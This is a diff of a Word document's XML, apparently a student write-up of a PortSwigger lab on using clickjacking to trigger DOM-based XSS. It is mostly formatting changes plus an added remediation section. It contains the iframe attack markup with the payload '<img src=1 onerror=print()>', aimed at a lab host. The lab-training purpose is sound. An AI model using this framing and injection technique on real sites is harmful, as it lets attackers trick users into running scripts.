--- a/PortSwigger Labs/Client Side Topics/Clickjacking - UI Redressing/Lab 4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS.docx
+++ b/PortSwigger Labs/Client Side Topics/Clickjacking - UI Redressing/Lab 4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS.docx
@@ -315,15 +315,33 @@
         <w:pStyle w:val="BodyText2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    iframe {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        position:relative;</w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>position:relative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -379,7 +397,17 @@
         <w:pStyle w:val="BodyText2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        position:absolute;</w:t>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>position:absolute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -412,7 +440,15 @@
         <w:pStyle w:val="BodyText2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        background-color: blue;</w:t>
+        <w:t xml:space="preserve">        background-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>color</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: blue;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -444,15 +480,28 @@
         <w:pStyle w:val="BodyText2"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;iframe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>src="https://0a7b00ef03ff9770813402e000270064.web-security-academy.net/feedback?name=&lt;img src=1 onerror=print()&gt;&amp;email=hacker@attacker-website.com&amp;subject=test&amp;message=test#feedbackResult"&gt;&lt;/iframe&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">src="https://0a7b00ef03ff9770813402e000270064.web-security-academy.net/feedback?name=&lt;img </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=1 onerror=print()&gt;&amp;email=hacker@attacker-website.com&amp;subject=test&amp;message=test#feedbackResult"&gt;&lt;/iframe&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -487,6 +536,216 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Input Validation and Sanitization:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Ensure that all inputs, including the "Name" field in the feedback form, undergo strict validation and sanitization. Remove or neutralize special characters that can trigger scripts. This will prevent the insertion of malicious scripts like &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>onerror</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>)&gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Content Security Policy (CSP) Implementation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Set up a robust Content Security Policy (CSP) that restricts the execution of inline scripts. This can effectively mitigate the risk of many XSS attacks by preventing the execution of malicious scripts even if they are injected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Use Anti-Clickjacking Measures:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To prevent the app from being framed and overlaid with malicious content, utilize the X-Frame-Options HTTP header set to either DENY or SAMEORIGIN. This ensures the application is not embedded within an </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on unauthorized domains.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -502,9 +761,9 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="56EA0605"/>
+    <w:nsid w:val="42BC76DD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="1D3E4D40"/>
+    <w:tmpl w:val="949245EE"/>
     <w:lvl w:ilvl="0" w:tplc="4009000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -590,7 +849,99 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="56EA0605"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1D3E4D40"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="2102020484">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1113286704">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
@@ -1000,6 +1351,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/PortSwigger Labs/Client Side Topics/Clickjacking - UI Redressing/Lab 4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS.docx
+++ b/PortSwigger Labs/Client Side Topics/Clickjacking - UI Redressing/Lab 4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS.docx
@@ -535,6 +535,104 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2342A4DA" wp14:editId="404AC9E2">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>644525</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="2667372" cy="1076475"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1434310885" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1434310885" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2667372" cy="1076475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
         <w:t>REMEDIATION</w:t>
       </w:r>
     </w:p>
@@ -711,6 +809,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Use Anti-Clickjacking Measures:</w:t>
       </w:r>
       <w:r>
